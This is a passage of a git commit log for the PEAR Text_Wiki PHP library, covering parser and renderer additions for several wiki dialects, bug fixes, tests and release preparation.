sprintf() format * Added CSS class configuration keys for all appropriate rules (*big* thanks to Bob Glamm, glamm at a-s-i dot com, who did a ton of work on this) ... except Wikilink, Freelink, and Image -- more coming for those later f189c39 * Render rules for Wikilink and Freelink are much more configurable: put new-link text before or after the page name, or use CSS only to control the look of new-links db71bf7 perfected the patches from Stephane le Solliec, image size guesses now work properly with non-local images f64c515 fixed bug 2316: swapped processing order to Center and Newline 57ed333 finished "perfecting" CSS and linking in the Image rule 68e5b84 updated comments, put in release date c2fb889 added note about Toc generation 1cbc0af added keys for column and row counts in the 'table_start' token (to support LaTeX rendering) ac35f3b removed 'translatehtml' rule from the parse/render rule set; it is more appropriate for HTML translation to be part of the Xhtml "format" than a general processing rule (particularly when we start doing LaTeX and other non-HTML formats) 7560e88 added HTML translation as part of the pre() method 4b08ca3 Wiki.php: whitespace changes 7c4360b Jeremy Cowgar has kindly submitted a prelminary LaTeX renderer. Thanks, Jeremy! 3025af1 added change note about Latex renderer, added Latex format class and render classes 31ce518 converted tabs to spaces in all files f4f3212 added Function rule 4484955 added Function rule for parsing and rendering b624e66 Wiki.php: fixed bug 2419 for getParseConf(), fixed similar bug in getFormatConf() package.xml: updated with new version and release date 43cb498 changed version number a416fcf removed Translatehtml rules; this is XHTML-specific, and so belongs in Format/Xhtml.php, not a parse/render rule pair. 4ef0ab3 added shortcuts for line keys ('a' for 'access', 'p' for 'param', etc) 5e375f8 major changes to XHTML renderer for 'Function' -- has complete format control now, not just CSS cb89fea removed 'JEREMY' output in Tighten, changed not-implemented message in Function 4600dcf added full output for plain text on the Function rule 5dd8a92 added comments, converted tabs to 4-spaces e70aa71 added changes for new release b8a4873 changed version number 263f49c removed extra trailing single-quote, per Bob Glamm d1c17d7 removed extra single-quote in Anchor, minor change Strong and Emphasis regex so they work inside Colortext properly 28e2ec8 fixed bug 2670, new links now get 'css_new' class (not 'css' normal class) d57e44b fixed bug 2916 (parser for "code" does not set all attributes) c6f5414 added feature 2971 (allow dot in interwiki rule) patch from Lukas Smith 3c98280 extended regex to allow for more page-name characters ec61d1c added conf key 'exists_callback' to allow users to specify a callback function to tell whether a page exists or not. 448ab62 gets a reference to the callback config instead of a copy, because the callback may be an object ac16a9f changed line indenting b202c09 added change notes and new release date, moving to "beta" 7db29e3 finalized for release 11dc690 fixed Bug:3336 e7ded30 moved all default pareing rules from Text/Wiki/Parse/ to Text/Wiki/Parse/Default/. this is to support alternate parsing rules as full class sets, e.g. bbcode or wikimedia. cd79330 added lookahead assertion that first character is not a colon; it was messing up such markup as Package::methodName() because a colon is allowed in the page-name. af048d1 updated version number 87865d0 added change notes af006a1 updated comment blocks, changed version number 167d1ba fixed bug 3387 (mailto link includes javascript). mailto links no longer include javascript window-targeting code. 4c73d3f now supports an optional extended character set for wiki page names; umlauts and so on should be legal if you call setParseConf('Wikilink', 'ext_chars', true). bcb4447 added url_base conf option d5b44c0 added broad swaths of docblock comments 4ce837f removed @package_version@ from sub-files, updated release info in package.xml 57c7700 more change notes, changed version number 06a3568 added subscript parsing support 918f57e added subscript rendering support eed2121 added subscript support 6a8bb7f fixed bug 3004 (Wrong path for rule "image") -- patch provided by reg at dav-muz dot net 85ed7af changed release date 7eab08d first stable release e42f935 added charset and quotes support to html translation (changed internal algo from mapping html translation tabloes to using htmlspecialchars and htmlentities) 7cf2dca fixed bug 3959, "XHTML lists not rendered according W3C Standards", where a single newline is not enough to end a paragraph before a list. added an extra newline to the returned (parsed) text. b42befc as part of fixed bug 3959, "XHTML lists not rendered according W3C Standards" (where a single newline is not enough to end a paragraph before a list) we now output one less newline when a list is starting, since the parser returned an extra newline when parsing. 3f088ca added a 'collapse' key to collapse the div horizontally within a table; this is for aesthetics, nothing else. 'collapse' is true by default. eb7fc78 parser returns an extra newline before the replacement to comply with the matching regex. cf857ca updated with bugfix change notes fa50edd fixed bug 4175 "Wrong transform method" by generating PEAR_Error objects when a parse, format, or render rule cannot be found. 8ea664c * applied feature request 4436 "Add option to getTokens to get original token indices" -- now the return array from getTokens() is keyed to the original token index number. 4449731 Fixed Bug #4473 Undefined variables in error() d980567 fixed bug 4474 to silence calls to htmlentities and htmlspecialchars so that errors about charsets don't pop up, per counsel from Jan at Horde. 9e8f1a3 Adding Underline rules 36c88dc Allow recursive sections. This won't happen often, but could be useful. 5054e46 Adding underline to rules 298dde8 Switching back, toggg says it doesn't work 9db0f7e So we can play with it (dev copy), that will constitute next test/*.phpt too, BBtest.txt for starting development of Text_Wiki_BBCode (not yet CS conform) 8fbd742 Creating the Text_Wiki_BBCode parser, it's a working copy, CS to be fixed 28af211 Comment: We match either [color..] or [/color], will be post synchronized c5a8a62 bad commented as // made a ?> from string becoming effective end php tag ! e07febc Made Font accepting nesting 8e50cd9 Fixed Code recursive regexp dad7c0a Fixed docbook headers, hope that is conform ! Set the BBCode rules list 3ec6333 Ooops, sorry, closing bracket got eaten e4fc585 Thanks toby, opening bracket for function/method must be on next line bf4d802 align dockblock comment stars 24af32a Fix bug #4719, "In Latex, newline rule does not produce a new line" dd862e0 require_once without parenthesis 5fbb551 Headers + post synchronization transmits nesting depth 38c4a67 Headers, nesting depth for synchStartEnd() and return null e47950a Class header, calculate offset if synchStartEnd() changes source + error return 9f22051 Headers 725a2f4 Class header 9964b8f Headers 6f8f511 SynchStartEnd() with nesting depth and return null c486b8d Request #4520 Additional space confuses image tag, adapted regexp 55ba88b Request #4634 Code block title/filename, uses conf css_filename edabaa9 sorry, forgot debug output e1e0d4f some more tests 3f2cd34 Headers 6020aa4 Initial version of quoted blocks for BBCode be118b1 Initial version of code rule parser dor BBCode 89c892b Include inherited class ! 37abc63 Sorry for the last empty line and . without spaces Note: headers will be done as a whole a056905 No more ugly include, actually rendering latex, other classes for Latex renderer to be done (currently Xhtml) .... 354162c Corrected inherits cd216f7 Latex renderer for font rule 68c6bdf Test data completed , the test script works now not only as cli but also from HTTP c18de9e Removed "ugly" dirname() in require_once 4afd501 No more change include path, check running on command line if 'cli' ... and more also, but it's minor, the test interface is finished and I'm happy with it 53b956f Enabled the default Paragraph rule b942826 Ouch !! Simple quotes don't interpret variables, mea culpa 2774806 Some more cleaning, introduced CSS 1fdcadf Typo af846d6 Plain Font rule renderer 2556a3a Checking in Cowiki, DokuWiki, and TikiWiki parsers and renderers Note: some of these rules depend on extensions I have made to some of the rules (such as anchor) I have also included an extended Text_Wiki class for Tiki 2f3b2c8 List rule with double staged recursive preg_replace_callback() 2873d7e Checking in missing Render classes (I thought I'd added these before..) 74e4ec9 Don't catch the '=' if optional numbering 9314fd0 Wikiplugins starts anywhere, not necessarly on begin of line, simplified the regexp cc02bdb A true test === for translate format conf is enough and works now ! 5c33524 Plugins produce wiki markup so are processed by parsing, no tokens produced 0a27224 The rule take care of nested plugins, the plugin processing is done by parsing as plugins produce wiki markup, this production is also recursively parsed case plugins produced b84807a Cleaning headers before to bundle in tikiwiki 53ee8fe headers fa641b7 headers ea2f9dd headers 3b93313 Fixing back justin's commit by synch with tiki 6895442 A new rule introduced by tiki for drawing boxes 9b38e7d Synching back justin's commits from tikiwiki, that's all what is ok, the rest is buggy and introduces extra dependencies (in tikiwiki copy) 563242d Synch back justin's commit in tikiwiki f393df5 Introduces tikiwiki/justin's collapsing in headers, needs some refactoting though 50e0d22 4 new rules introduced for tiki afcc98e Headers ... ouf ! 001f427 Headers 86f6e18 Revamped the nesting in parse to catch orphans start or end tags 33f974e Made the parsing recursive 1ba469c ooops , sorry debug trace ... 192f985 Fixed comments befa7d6 Making the rule recursive d636e5f Making rule recursive e2d5d7b As rules are now recursive, no more need to extend Parse class d16096c Moving BBCode to standard dirs dfe0cb2 It's in standard Text/Wiki/Render/Xhtml now 98a32fc It's in standard Text/Wiki/Render/PLAIN now 9dd6161 It's in standard Text/Wiki/Render/Latex now 1d57854 Moving BBCode parser to standard directories e016c93 Now in standard Text/Wiki/Parse/BBCode 37b810c0 Let's start a PEAR::Text_Wiki_Pedia 970ed2e Sorry, the wiki is Mediawiki ... not Wikipedia 42bc186 Sorry, it's now in Text/Wiki/Parse/Mediawiki/ 9affb00 Base class for Mediawiki parsing d9ae745 Extending the list of parsers and renderers available f7da336 Fixed comments and headers 8afaca8 Wrong @see in headers a2a4aab As the parser is now "standard", no need to require Text/Wiki/Parser.php a58f6b1 Fixed the parse Addpath, removed the render one eb5e8fb Makes the 2 [url.. syntaxes and inline urls, emails to come 8e7c0ad Implemented the config for refused schemes and disable inline urls f01d2b9 Integrated [email] markup and inline emails 7d696cd Images with schemes, extensions, urls and local path configs c9716a3 Some more tests for URIs , mails and images 1f97805 Ooops ! forgot some debug output ... f9743eb Fixed comments and wrong cvs Id 52ea7d5 :-o The most important was missing in Text_Wiki ! Smile ! :-) d3791ee Enabled the Smiley rule cacfad0 Fixed an inversion in left handed smileys, does not catch anymore the boundaries 3a757bf Smiley plain renderer :) e0199e6 Smiley Latex renderer :) 80795ba Smiley rule Xhtml renderer :) a12ce3f Typo adfce27 Comment 3baf115 Removed the Specialchar rule as Smiley is now in 515784c Option with _ instead of -, misplaced docbook tags 9ffbc87 Config keys with _ instead of - , misplaced docbook tags c5657ec Simplified configuration 08868f0 More simple and user friendly 3ba3415 Full compatible with HTML_BBCodeParser, configuration summarized thru in file 794278f Disabled all rules not yet existing, they will be enabled as the parsing rules will be produced 7e2dc61 A first implementation, span and row_span to follow ... e0e851c Implicit start of row after start of table same, implicit cell after row ... 8f27163 Fixed the header optional attribute for cells 31d767b Caption and free format 7cecf57 Missing rendering rule in Latex and Plain 84c326c Better use the \caption{...} command 48c97fe Missing rendering rule in Latex and Plain 1545103 Missing rule in Latex and Plain 33367d9 Missing rule in Latex and Plain 960c561 Missing rule in Latex and Plain ea24390 Missing rule in Ltax and Plain 6952ddb Rowspan, colspan and avoid empty cells 1f0705d Emphasis needs Strong 2bcab0f Rowspan and space before free format f03e88b Colspan and rowspan also recognized without quotes be748d1 Missing rile in Latex and Plain 077a20c Excluded > from path 5023da3 Secured links on images, don't accept Wikilinks if disabled 1fa82ea Completed notes, files and maintainers for the release 1.0.1 5ac0e8a Preparing first release of Text_Wiki_BBCode cb2974a # is optional for hexadecimal colours 826f5e9 Output the source of the image 9a5d779 Bug #5397 variable used inside single quotes bugs WikiLinks f1ccdae Preset $collapse to null, sorry for non Tiki users 8940208 Unitiliazed row and column 's spans when coming from bot mediawiki parser f9f13d4 > is already > , too much gready on the non quoted args 9321ff9 Phplookup and Function rules aren't used by Tiki 1abc053 As Plugin may introduce some more markup, raw and preformated had to be done in the same "round" 531ee85 Function and Phplookup rules aren't used by Tiki bf5418b Documentation abd549b Tiki people may also smile :) 71d03dd Adding Text_Wiki_Tiki package file dcce67d Fix summary and description 05c400c Adding apckage.xml for Text_Wiki_Doku bcdbb44 Adding package.xml for Text_Wiki_Cowiki ce5f94d Add toggg as a lead for all 3 new packages (sorry about that toggg) 5760ec1 Obviously, the # is to be kept in the anchor option, #5660, merci jeremy Lecour 2d1f12f Add superscript and subscript extension e78308c Turn on Superscript and Subscript rules 3ad3ddd Request #5767: relative [url] syntax not supported (e.g. [url=/contact.php]) aa067c9 onclick in lowercase for Xhtml compliance (Bug #5847) fb58bb1 Don't mix bullet and numbered lists when following each other b9c8739 Ooops ! debug output, sorry 39ef883 Option relative_enable default false for relative urls (Request #5767) Refuse ] , [ and ' in path part of the url, should be urlencoded c8ee74f Added more tests for url, email, lists and xss craps ca6602a Prepare release 0.0.2 (alpha), changelog, added firman as lead, Include examples showing how to replace deprecated HTML_BBCodeParser by Text_Wiki_BBCode ead45b7 Render enumeration type a, A, i, or I b01d93e Fixed enumeration type [list=A] (as html type: a,A,i or I) aa677b5 Prepare release 1.0.2 (stable) changelogs and BBCode dependency on this release 4d5ec6a Mixed list ends only if the other kind of list starts at first level but may contains sub-lists from the other kind (Bug #5879) 1b74881 Back release 1.0.3 (stable) late update in Default list parser intoduced a BBC 1d3f504 Notice: Only variables should be assigned by reference (bug #6010) 355284c Only variables should be assigned by reference (bug #6010) 2a9b38c Rendering Fix for Tables (Missing Whitespace) af3c663 Add new Parsers for Text_Wiki_Mediawiki dc29118 Corrected example loader, htmlspecialchar the source 2318e66 File did not differ from the one in Default. 226f47e Adding package.xml for Text_Wiki_Mediawiki 9984e93 seems I forgot the release date, anyway thanks ritzmo ac2513a Added Ooo , Pdf and Docbook in renderers to be tested, would be better to have free input. 6f4df3f Very sorry, forgot Text_Wiki does not use PEAR 5c8d6d3 Add the Wilink rule (#6623) 3881763 Spaces around headings are not mandatory (#6623) e0a2dd9 Handles errors more nicely (Text_Wiki includes PEAR only in that case) Changed Ooo in Ooosxw as per Lukas's request c9f40c2 Let each php error display 548f31f Starting the DocBook renderer , caution, only an half is yet ready, the rest just have headers done eeb902c urlencode() the page name and anchor as they are used in the query part of the url 46697ce #6623: missing quantifier '?' d798cb8 A space is enough to delimitate a heading, no need for a linefeed (#6623) 3818bb5 Some more rules , 35/45 done ... 0026d47 3 more rules (84%) 1002f2a Piano ma sano (hopefuly) going on ... 1c99ac4 Arrange comment 1507853 Autofind parser in test files must be case sensitive a8d3c2b Swallow away line breaks within the lists Starting count by zero as Xhtml render relies on it adbec68 Page names must be urlencoded in the query, not htmlspecialchared (may contain spaces) e29d99b the 38th rule ... 05e91cb The basic (now empty) basic Render class for Docbook fc1ec64 Updated changelog , prepare release 28d09d7 Correct changelog ec91795 Makes the sectioning configurable and the section levels sequential (a special dedicace for mj :) ) d53d636 Empty section in configuration strips the sections for a level fff35d9 A method for cms needing several parsing in a session, also simplify the instanciation. Merci davidc for comments ca7945f Abstract encodings for text and urls, prepare #5953 cleaning 74a59dd Wrapping the urlencoding 35ca37a Overwrites and uses textEncode() for text translation 6deeb91 Common text encoding (#5953) 15b5f7a Default text encoding to htmlspecialchars e8f6a98 Use text encoding wrapper b879da3 It's not Bold produced by Emphasis, but Strong, and only by rendering: Emphasis inserts a fake rule 'Strong' (null) just to get the render obj created 5ce1f0d The overwrite of getTokens() method is no more needed since rev. 1.31 of Wiki.php Comment out render pathes extension, merge with tikiwiki repository is still TODO ! e114abb The overwrite of getTokens() was not needed and even dangerous ... 568c4ec Correct the key used in changeRule(), ensure no double new rule. However, I'm still wondering what's the goal in it, overwriting the rule's parse and render methods should be the right way ... 3a532d7 ... may be multiline a9596cf The Jaws guys said we eat too much memory :( Load render objects only if needed :) 656fd0c Base Wiki extensions were forgotten for Cowiki and Doku parsers 874cc0f No more need to fake a Strong parsing rule since Render loads dinamically c6216e9 Prefer rawurlencode() to urlencode() to get %20 and not + for spaces (e.g. ftp compatibility) Corrected the comments: for now, it can treat only url chunks 8f17da4 Whitespace changes only. 11f5be5 Change to allow code type="parsed" d85a0c3 ROLLBACK fe1ae09 Cut out "?>" php tails, preg_replace('#\?>\s*\Z#ms', '', $script); 1a9e08f Cut php tail "?>" 32ecb7e Wikilink also process Image and Interwiki (empty for now) Prefixes parsing for autolink, interlangage and interwiki Target triming and option to trensform spaces in underscore a6535cf Correct the prefixes handling 544b414 Allow parsers to give the full url in token options instead of the site + wiki page 6a4645b Allow parsers to give the full url in token options instead of the site + wiki page Urlencode the page name Removed unused configuration option 'target' 4ef6bac Complete the rendering with indication of (url) or (site:page) f38c0b8 Allow parsers to give the full url in token options instead of the site + wiki page e9e5f9c Process interlangage only as an Interwiki c8f08d3 Image and Interwiki are now done by the Wikilink rule Corrected, Wikilink and its regexp, extended to produce Image and Interwiki These 2 rules don't exist anymore as independant class but are still configurable/switchable 07850fd Take align attribute (left, center, or right) as piped after the | in image tag 424a631 Reversed order of parameters in singleton. Corrected grammar and expanded comments in singleton. Changed require_once to include_once for the parser to prevent it borking at compile time. Fixed spacing to comply with PEAR CS. 9662c45 Fix for new parameter order in singleton. c2e38fb Fix for non-default instantiations of the constructor. faf7a70 Fix undefined offset error 06bcdd1 Fix undefined offset errors bfff989 Fix undefined variable notice b86d69a Fix setting of anchor, fix output of links (new link code has not been merged to mainline yet....) 09402ab add missing return 5c8cc67 Start release preparation Introduce Del as developer so he will not be put out by the release itself Fixed number to 1.1.0 , we cannot use 1.0.4 anyway Prepare a free place for logs 3c3a1c0 Put bases for the release, more details to come, release is not ready d6c51f8 That should be all for now. Expected release is 1st of March. f9f0b5c Put back new style links for Doku wikilink 132b33c Add support for wikilinks which are split into start and end tokens around link text - This is needed for proper conversion of one syntax into another and allows for formatting within a link's text - Note: old style still works and is still used in the Default parser, newer parsers should use the new type 1b4782d Deak with the case where the text is empty - This allows the parser to not set text when there is no text given for a page -- and thus allows *really* proper wikilink rendering in other dialects bb1115b Fix undefined offset notices in Cowiki parser's Wikilink and Interwiki rules f23f480 Re-add code to not set 'text' if no explicit text is given de1dc1e When text option is empty, use page which is not urlEncoded and textEncode it cd60e08 Change misleading method name 4101552 Revert rename of singleton 8b69405 Replace preg_replace with str_replace, fix variable names 23a0b79 Revert changes to constructor as it cannot instantiate the parser class as it should Reverse parameter order to singleton() as it no longer matches the constructor and $parser it the mor eimportant parameter Add a factory() method to complement singleton() Update factory()/singleton() to return/handle errors ad0cf01 Reordered the changes, factory() introduced Default has now its own implementation, added Text/Wiki/Default.php Justin is now lead f6323cc Push release 1 day ef64889 Alter factory to check to make sure the file is readable before including it 479350d Check in factory using @fopen($file, 'r', true) instead of looping over include_path a83c375 Switch to Text_Wiki error handling for factory and singleton 332e57c We just need to die if required sub package is not there 23b641d Set $wiki->newRendering to use new experimental preg_replace_callback rendering method 25d497f Move encoding calls to where the HTML is created instead of before processing happens Remove setting of $text which broke outputting of some links cabef87 Added a comment 50767fb Variable Substitution Bug #7091 (thanks randlem at bgsu dot edu) Replaced all "dangerous" string syntaxes Map Freelink on Wikilink as in Xhtml cf335bc urlencode the part of the anchor after # use $page e0717e3 textEncode css before inserting into HTML 7ef7660 Fix issues with parsing URLs in (( )) Fix notice 80f4af0 Fix notice about undefined index page 1a0d380 Fix paragraph rendering for Dokuwiki dfb06c3 Use Tikki-Wiki List-Parser for now, as it uses the same syntax. 1dc1b10 First Version of a Mediawiki Deflist-Parser. Contains a few known Bugs. 1917ece Prepare next release 0.1.0 Completed changelog , added / removed files , dependence to Text_Wiki-1.1.0 392b1de Update summary and description. 4d4065b We release today 8395d96 Thanks to Daniel , some better english , will copy on site as we don't expect to release soon. bcb3664 Optimists hope it's the last typo , let's go , thanks for help ! 8ffe4f0 Ooops ! Forgot to commit Deflist addition . This is correct in the release 0.1.0 90299aa Correct Cell-Parsing (#7392) f175c2a Many thanks for the great experience. 25a24c1 Fix Anchor in Wikilink d930cd2 Encode text to avoid XSS 64efc1c Follow Mediawiki markup standards with single newlines (#8174, thanks Brian Sipos) dac6006 Add Code- and Tt-Rule (thanks Brian) 57560c6 Add Sub-/Superscript rules 9bb9ed9 Bug 8313 fix anchor output when used in conjuction with sprintf (thanks to bjs5075 at rit dot edu) 6a71fc5 Lists can now skip levels up AND down 94ec1db Fix Bug #8402 (thanks brian) f123996 Fix Bug #8449 (thanks brian) c068c26 Fixed Headers, Added Preformatted rule (used Brian's syntax for this one) and fixed resulting Bug #8448 49b1c20 Fix Bug #8496 (thanks Brian) 8648c5a Implemented Request #8451 (thanks Brian) 3d8e58f Fix Bug #8501 (thanks Brian) 394ebf9 Fix Bug #8505 (thanks Brian) 18a032e Set up a configuration variable (temporarily) to switch renderer algorithms c99dc8f Prepare for 1.2.0RC1 release 3b05c22 Adding package2.xml, fixing multi-line summary 4b50ba1 Add a stack-based rendering callback system which allows for renderers to easily alter the text between start and end tokens (such as for Blockquote wiki-format output) Fix Blockquote parse algorithm - use an int instead of a stack of "true" - Blockquote always puts newlines back where they came from and *no longer adds any new ones* - Fix levels of Blockquotes (they weren't working at all before) Fix rendering of Blockquote for Doku renderer using new render callbacks 93a6c67 Adding the first test d8bcd34 First commit of Text_Wiki_Creole - parser and renderer. Fingers crossed :-) 88c63a6 start/end tokens 814404d check-inner-tags counts open/end tags 0f3dbfb *** empty log message *** 593bcde Back lead , we need to kill recursive (?R) b7594ba Add balanced token checking d5811d1 a test for [list] in BBCode subdir (inspired from Creole) bf707e6 *** empty log message *** 93d83af Add file:// protocol to Url-Parser, will most likely be added as an option later on (as in Mediawiki). Closes #9383 36d1c73 dunno if someone ever used this, but has been broken for quite some time. 2fa2440 Byg #7320 use UTF-8 syntax instead of "extended" fa84ae3 Combine UTF-8 and non-UTF-8 regexes....this will probably fail horribly 7676d36 Only use \p is ext_chars is on. This should be switched to be turn on utf8... bfe7f95 Add another UTF-8-ism 427cfcd Bug #7320 add a new utf-8 parse option for Wikilink and Freelink 71b84a4 Bug #6292 force headings and hrs to have extra newlines around them to avoid them being in paragraph tags (thanks to ) 1d4c9eb sprintf if slow 94e02b6 Back lead e261c5e In case of url with description, let the description parsable (#9393) Added a corresponding line in BBtest.txt c5fdade a !empty() intead of array_key_exists() , maybe dangerous 8eadd20 Prepared release , bug fixing and warning people about pcre's limitations. 5f25651 Generated with pear convert , back added cvs tag , removed php dependency 44439b8 pear package needs the php dependency, put it back fba9ace Update for release 44fa4e6 making the parser compliant with version 0.4 of specs 3de1e75 making creole parser compliant with version 0.4 of specs a4af266 making creole parser compliant with version 0.4 of specs 20327d6 making creole parser compliant with version 0.4 of specs 2745f00 making creole parser compliant with version 0.4 of specs f528b05 making creole parser compliant with version 0.4 of specs 8bdaec0 changed version to 0.4.1 25ee340 ordinal numbers are automatically superscripted (1st, 2nd etc.) eb3fc5b bug-fix:
now out of

a2a20c1 2 backslashes are needed 9bcbbaa bug-fix: text defaults to url 69249fb comment about newlines 1b5a63a changed version to 0.4.2 1a1b12b removed htmlentities 8ef4d02 output goes through textEncode 038ac2e question mark for ungreedy regexp 537b860 include trailing braces a420458 allows specifying class in options cb20513 allow specifying a class in conf - if a class is specified, no style is inlined 26e3e3b aligning to creole 0.5 7cd5f73 aligning to creole 0.5 + additional markup 7726637 fixed url/wikilink priority problem 33d7d66 support for %%% d6aa14d aligning to creole 0.5 + additional markup experiment with hyphenated lists and footnotes df205f7 email style emphasis 93d8279 allows specifying class in options c6abab4 Prepare for new release 428289a Correctversion number d9ecd6a #10148 Simplify the row regexp to work with new PCRE, thanks Mark Wiesemann for the testing and support 7245baa If target == '_self' don't add an onclick acd8836 Request #10128 use CSS instead of the depracetd align attribute for images. Thanks to ritzmo (Moritz Venn) for the patch 2021562 Add support for alignment in image links 7fc7f5f removed notice about undefined name c57c3ab removed notices about undefined index 46134bd removed notice about undefined variable a199fb3 removed notice about undefined index 8985780 removed notice about undefined type (in renderer) 901e145 removed notice about undefined 'css' index 48498aa removed notice about undefined 'type' index fa93339 various ways to escape end of section 3dc57f4 removed notice about undefined variable 27ebee2 removed notice about undefined variable 426c149 escape repeated char bbe668f allow numbered lists 63bb69c restoreraw eb32dc9 support escape of closing sequence 30eb776 improve single / emphasis detection 1cebff8 improve single _ underline detection e772035 improve single * strong emphasis detection 49e9c07 Bug #11262 Fix issues with any block causing no output f4a9ddf Bug #10144 Fix all lower-case rule names cc36bae Prepare for 1.2.0 release d5c87b9 API should be stable too 317d201 Fix #11578 by adding

 to Syntax of Code and switching Parsing order with Preformatted
fd715de Implemented #9378
48b294a Fix #8450 and probably receive a bug-report for it :-)
d1bfcec Implement #8503, thanks Brian
3588e17 upgrade to Creole 1.0 specs
8f37ef2 upgrade to Creole 1.0 specs
f88a3a2 Box (div) for footnotes
42eba13 Box (div) for footnotes
b142ed7 accept bold par after list
4371c4d *** empty log message ***
08e23ec added support for deflist
67ecd5b free urls can be escaped by a tilde
3c68ffc single slash parsing moved to Italic.php
e7495f8 single star parsing moved to Bold.php
f5ee69f single underscore is now disabled
7417fc7 removed warning about undefined caption
2585c5b removed warning about undefined alt text
3d70023 enclose block-level images in a table
70b78cc enclose block-level images in a table
d1ab13b allow tildes in image urls
09a2f05 don't escape alphanum chars, it's not consistent with urls
a0d7024 *** empty log message ***
4988017 using 'empty' to avoid notices
1c4a6b1 Fixed priority among images urls and tables (about pipe)
5e5a640 Commented out wrapping of images in tables
743b8e3 Avoid handling images which include other markup
413c51e Bug #12490 change delim to a utf-8 compatible value
0ef6b47 Bug #12619 allow any number of spaces before the list items
21ce607 Bug #12580 fix license
578e944 fixed bug preventing urls to be used in tables
61de090 fixed bug preventing urls to be used in tables
55c78bc minor - indent
762e81b bug fix - decimal numbers at beginning of line resulted into numbered list element
8a5c434 bug #14869 add SKIPIF for mossing config, thanks to daniel
0b83b96 use an include
97be725 reorganized superscripting of ordinal numbers
32c82a1 "No linebreaks are allowed within headings." (From specs.)
feca7cb implement fr#16055 (include brackets in url regex)
1ede0a4 implement fr#14348: allow width/height for images
463c91f fix #12825: remove helper code which looks unneeded to me
4e57c36 Update wikilink renderers to be backwards-compatible
12e29e1 Fix syntax error
c567a00 Bug #9154: token() method for class Text_Wiki_Render_Tiki_Paragraph implemented
ec71a57 Bug #16322: properly url rendering
9f0c82b Feature request #16315: class Text_Wiki_Render_Tiki_Preformatted implemented
b2bba4d add Creole to the list of parsers and renders
81c7cb6 add new tests using PHPUnit
bc2640b Properly rendering of Tiki heading
2ef154f Warning message about the need of magic_quotes_gpc = Off
566626d Text_Wiki_Render_Tiki_Image can render images without additional parameters
372937b Added tests for all Tiki Render rules
4318cf1 Fix Text_Wiki_Render_Tiki_Code
71a18d4 Renaming tests files Add Text_Wiki_Parse_Mediawiki tests file
fbb77f1 Fix: = heading = is a valid MediaWiki syntax
f493c45 adding files to .cvsignore
c967b52 Adding first tests to Text_Wiki class
c8dd8f0 Fix specific case of Tiki rendering of wikilinks
ffa1cd3 More tests to Text_Wiki_Parse_Mediawiki
bfa5103 Removing unnecessary tearDown() method from test class
bb32891 More tests for Text_Wiki
99df69d Adding tests for the Text_Wiki_Render class
3cd2847 Fix tiki definition list render
991172d Implemented one more Text_Wiki_Render_Tiki test
4c0b4ae Two more tests to Text_Wiki core class New directory for tests fixtures
7ff9f63 fix a huge number of wrong MIME types. UGH.
8cbc3c4 Text_Wiki tests now can run from any directory
1788975 Add Text_Wiki_Parse_Mediawiki_Redirect and Text_Wiki_Render_Tiki_Redirect
37fc223 Tests for the Mediawiki wikilink parser
c8829c0 Tests for the URL parser of Mediawiki
1507238 Tests for the rules raw, preformatted and emphasis of the Mediawiki parser Change to the raw rule regexp to consider optional line break before  and after 
36fb206 Tests for the rules raw, preformatted and emphasis of the Mediawiki parser (missing one file on the last commit)
61b3aaf Starting tests for the Text_Wiki_Parse_Tiki
f36bc00 just indentation (removing tabs and aligning)
fbb87d0 Fixing tiki render for deflist
0a9fc18 Text_Wiki_Render_Tiki_Deflist now support definition list without definition narrative
00da254 Tests for mediawiki rule list parser
06d4dde Mediawiki rule list does not consider redirect rule as list
152ebb6 changed the fixture for testing the parser of mediawiki list
ea1805d Bug #16455 - proper parsing of Mediawiki bold and italic (using algorithm from Mediawiki parser)
72de0ae Proper Mediawiki parsing and Tiki rendering for heading (fix problem with linebreaks)
a8ce257 Adding new line at the end of Tiki list rendering Generic test using Text_Wiki::transform() to convert from Mediawiki syntax to Tiki
f92cd76 Add prefix option for the configuration of the Tiki Image Render Tests for the basic syntax of Mediawiki Table Parser
3c1750a Improve Text_Wiki_Render_Tiki_List
baac2bc Another tentative to fix heading parsing and heading from Mediawiki to Tiki More unit tests for lists
be8a376 Converting Text_Wiki_Tiki and Text_Wiki_Mediawiki to 2.0 of package.xml
679095c Updating the list of Text_Wiki_Mediawiki files on the XML and adding myself as one of the developers
f9bacbb Updating the list of Text_Wiki_Tiki files on the XML and adding myself as one of the developers
14130b0 Removing obsolete test file
c7963d9 Removing unused file
e52f83a Using a simplified syntax for rendering Tiki redirect
046cfbd Preparing new release of Text_Wiki_Tiki and Text_Wiki_Mediawiki
8a5540c Bug #15758 Add # as a possibility for the last char in a URL
573b8f3 QA release prep
c86c008 1.0.2
61de383 Just avoiding undefined offset notice on Mediawiki wikilink parser
08f4ffc Just avoiding generation of php undefined index, offset or variable notices
0418890 update Text_Wiki_Render_Tiki_Redirect to use new Tiki redirect syntax
5c24b70 adding missing files from previous commit
b5b0f43  * tests.php >> AllTests.php to follow PEAR convention  * kill E_NOTICE: remove include to PHPUnit/Framework.php
b40867b cs
108c54e  * include config.php (if available) allows us to run 'phpunit AllTests.php' as well
da8d739 whitespace foo
7691fbf  * add testcase for bugs, #18289
a722380  * test seems to work standalone only  * switched to factory(), apparently __construct is deprecated
c6587d9  * added __construct() for PHP5
3e4f577  * applied patch from #18289, thanks yunosh
d2f9f40  * added BugTests (work in progress)  * rename test suite
035d469  * added appropriate require_once calls, #14604
c781a15  * bugfix for #11649: regex updated (from Horde, thanks yunosh)
3349762 fixture and test for #11649
784aca9 Remove error reporting in tests. (Bug #19028)
a630e55 Bug #12722 HTML Blockquote compliance
aa6de81 Request #12569 Adding 'base_url' to XHTML Toc renderer
35d44f0 Bug #12719 Blockquote parsing bugs
4fd4015 Fix skip behaviour check
ee8e07e Remove skipping behaviour
06b707b Remove skipping behaviour
3c85b29 Updated test expectations
076d0bd Update test expectations
16cc24f Prevent E_NOTICE
8c57af5 Updated test expectations (TODO - go learn more about LaTeX to ensure this is actually correct)
b46b4b1 Enhancement: composer setup
256a03e Enhancement: composer setup
fdd6eb9 Add travis
ca16f8b Bug #20110	package.xml does not validate
7ab421c Remove package 1.0
565531c Bug #20110	package.xml does not validate
2eab64a Bug #20110	package.xml does not validate
35063a6 Bug #20110	package.xml does not validate
1560847 Cleanup some license headers Fix pear bug #20274 Also see 21ce607014ae3445147be2e52ceacdca0ca7b503
c392046 Release prep
639b4a5 Trailing tag
ded586e Update
1bad1aa PHP5 constructor must be first for upwards compatibility
056aacd Make static methods static
eaa30b3 Fix file modes.
ed26feb Make constructors BC and FC.
14ac6f7 Remove debug output.
894f823 Remove unnecessary reference, causing E_NOTICEs.
